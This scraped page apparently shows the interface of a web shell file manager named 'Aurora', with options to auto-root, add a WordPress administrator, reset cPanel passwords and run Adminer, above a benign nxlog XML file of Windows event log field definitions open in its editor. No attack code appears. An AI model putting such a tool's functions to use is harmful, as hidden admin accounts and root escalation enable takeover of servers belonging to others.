Aurora
Adminer
Auto Root
WP Admin
cPanel Reset
Anti Backdoor
Root
usr
share
nxlog-ce
Upload
New Folder
New File
Name
Size
Permissions
Actions
..
-
-
-
Upload File
Select File
New Folder
Folder Name
New File
File Name
Add WordPress Admin
Database Host
Database Name
Database User
Database Password
Admin Username
Admin Password
cPanel Password Reset
Email Address
Edit: im_msvistalog-fields.xml
<fields> <module>im_msvistalog</module> <field> <name>raw_event</name> <type>string</type> <persist>FALSE</persist> <description> <en> A string containing the EventTime, Hostname, Severity, EventID, and Message from the event. </en> </description> </field> <field> <name>Message</name> <type>string</type> <persist>FALSE</persist> <lookup>FALSE</lookup> <description> <en> The message from the event. </en> </description> </field> <field> <name>EventTime</name> <type>datetime</type> <persist>TRUE</persist> <description> <en> The EvtSystemTimeCreated field. </en> </description> </field> <field> <name>Hostname</name> <type>string</type> <persist>TRUE</persist> <lookup>TRUE</lookup> <description> <en> The EvtSystemComputer field. </en> </description> </field> <field> <name>SourceName</name> <type>string</type> <persist>TRUE</persist> <description> <en> The event source which produced the event, from the EvtSystemProviderName field. </en> </description> </field> <field> <name>EventID</name> <type>integer</type> <persist>TRUE</persist> <description> <en> The event ID (specific to the event source) from the EvtSystemEventID field. </en> </description> </field> <field> <name>Task</name> <type>integer</type> <persist>FALSE</persist> <description> <en> The task number from the EvtSystemTask field. </en> </description> </field> <field> <name>Category</name> <type>string</type> <persist>TRUE</persist> <description> <en> The category name resolved from Task. </en> </description> </field> <field> <name>Keywords</name> <type>integer</type> <persist>FALSE</persist> <description> <en> The value of the Keywords field from EvtSystemKeywords. </en> </description> </field> <field> <name>Channel</name> <type>string</type> <persist>TRUE</persist> <lookup>TRUE</lookup> <description> <en> The Channel of the event source (for example, `Security` or `Application`). </en> </description> </field> <field> <name>AccountName</name> <type>string</type> <persist>TRUE</persist> <lookup>TRUE</lookup> <description> <en> The username associated with the event. </en> </description> </field> <field> <name>AccountType</name> <type>string</type> <persist>TRUE</persist> <lookup>TRUE</lookup> <description> <en> The type of the account. Possible values are: `User`, `Group`, `Domain`, `Alias`, `Well Known Group`, `Deleted Account`, `Invalid`, `Unknown`, and `Computer`. </en> </description> </field> <field> <name>Domain</name> <type>string</type> <persist>TRUE</persist> <lookup>TRUE</lookup> <description> <en> The domain name of the user. </en> </description> </field> <field> <name>UserID</name> <type>string</type> <persist>FALSE</persist> <lookup>TRUE</lookup> <description> <en> The Security Identifier (SID) which resolves to <<im_msvistalog_field_AccountName,$AccounteName>>, stored in EvtSystemUserID. </en> </description> </field> <field> <name>SeverityValue</name> <type>integer</type> <persist>TRUE</persist> <description> <en> The normalized severity number of the event, mapped as follows. [cols="2", options="header,autowidth"] |=== |Event Log Severity |Normalized Severity |0/Audit Success |2/INFO |0/Audit Failure |4/ERROR |1/Critical |5/CRITICAL |2/Error |4/ERROR |3/Warning |3/WARNING |4/Information |2/INFO |5/Verbose |1/DEBUG |=== </en> </description> </field> <field> <name>Severity</name> <type>string</type> <persist>TRUE</persist> <description> <en> The normalized severity name of the event. See <<im_msvistalog_field_SeverityValue,$SeverityValue>>. </en> </description> </field> <field> <name>EventType</name> <type>string</type> <persist>TRUE</persist> <lookup>TRUE</lookup> <description> <en> The type of the event, which is a string describing the severity. This is translated to its string representation from EvtSystemLevel. Possible values are: `CRITICAL`, `ERROR`, `AUDIT_FAILURE`, `AUDIT_SUCCESS`, `INFO`, `WARNING`, and `VERBOSE`. </en> </description> </field> <field> <name>ProviderGuid</name> <type>string</type> <persist>FALSE</persist> <lookup>TRUE</lookup> <description> <en> The globally unique identifier of the event's provider as stored in EvtSystemProviderGuid. This corresponds to the name of the provider in the <<im_msvistalog_field_SourceName,$SourceName>> field. </en> </description> </field> <field> <name>Version</name> <type>integer</type> <persist>FALSE</persist> <description> <en> The Version number of the event as in EvtSystemVersion. </en> </description> </field> <field> <name>OpcodeValue</name> <type>integer</type> <persist>FALSE</persist> <description> <en> The Opcode number of the event as in EvtSystemOpcode. </en> </description> </field> <field> <name>Opcode</name> <type>string</type> <persist>TRUE</persist> <description> <en> The Opcode string resolved from OpcodeValue. </en> </description> </field> <field> <name>ActivityID</name> <type>string</type> <persist>FALSE</persist> <lookup>TRUE</lookup> <description> <en> A globally unique identifier for the current activity, as stored in EvtSystemActivityID. </en> </description> </field> <field> <name>RelatedActivityID</name> <type>string</type> <persist>FALSE</persist> <lookup>TRUE</lookup> <description> <en> The RelatedActivityID as stored in EvtSystemRelatedActivityID. </en> </description> </field> <field> <name>ProcessID</name> <type>integer</type> <persist>FALSE</persist> <description> <en> The process identifier of the event producer as in EvtSystemProcessID. </en> </description> </field> <field> <name>ThreadID</name> <type>integer</type> <persist>FALSE</persist> <description> <en> The thread identifier of the event producer as in EvtSystemThreadID. </en> </description> </field> <field> <name>RecordNumber</name> <type>integer</type> <persist>FALSE</persist> <description> <en> The number of the event record. </en> </description> </field> </fields>